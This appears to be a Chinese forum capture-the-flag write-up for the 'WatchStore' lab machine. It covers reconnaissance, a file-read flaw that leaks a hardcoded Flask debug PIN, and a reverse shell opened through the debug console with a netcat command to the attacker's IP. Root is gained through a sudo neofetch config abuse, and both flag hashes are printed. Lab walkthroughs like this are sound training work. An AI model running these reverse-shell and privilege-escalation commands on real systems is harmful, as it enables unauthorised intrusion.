找回密码
 立即注册
首页 业界区 科技 TheHackersLabs WatchStore writeup

TheHackersLabs WatchStore writeup

劝匠注 7 小时前
信息收集

nmap

1.png

2.png

获取userFlag

访问8080
3.png

发现url变了,那这里就需要写hosts了,在hosts中添加域名对应关系后再次访问
4.png

扫一下目录,这里我先是用dirsearch扫,只得到了一个console页面,进去的话是需要输入PIN码,那这就说明后端应该用的是flask模板,且开启了debug。那么如果需要计算pin码的话就需要去读相应的文件,这就需要我们能够找到一个报错页面。所以很有可能还有一个页面是没有扫出来的,换dirb扫扫
5.png

果然拿到了一个read页面
6.png

这里提示有一个参数为id,随便传个值看看
7.png

根据报错信息,这里应该是一个文件读取的点,先读一下app.py
8.png

在最顶部发现了PIN码,这里是吧PIN码是硬编码的,看来是不需要计算了,然后就到console页面里,通过python代码弹shell
  1. import os;os.system('busybox nc 192.168.43.180 8888 -e /bin/bash')
复制代码
9.png

然后稳定shell后在家目录下就可以拿到userflag了
userflag:4b100d01fcf0d9ca1959dca8dbb18460(MD5)
获取rootFlag

sudo -l看一下
10.png

这个在GTFobins上是有利用方案的
  1. echo 'exec /bin/bash' > shell
  2. sudo -uroot  neofetch --config shell
复制代码
11.png

这样就拿到root shell了
rootflag:aa41469df6e95166f9babccfbfc256c3(MD5)
 

来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
您需要登录后才可以回帖 登录 | 立即注册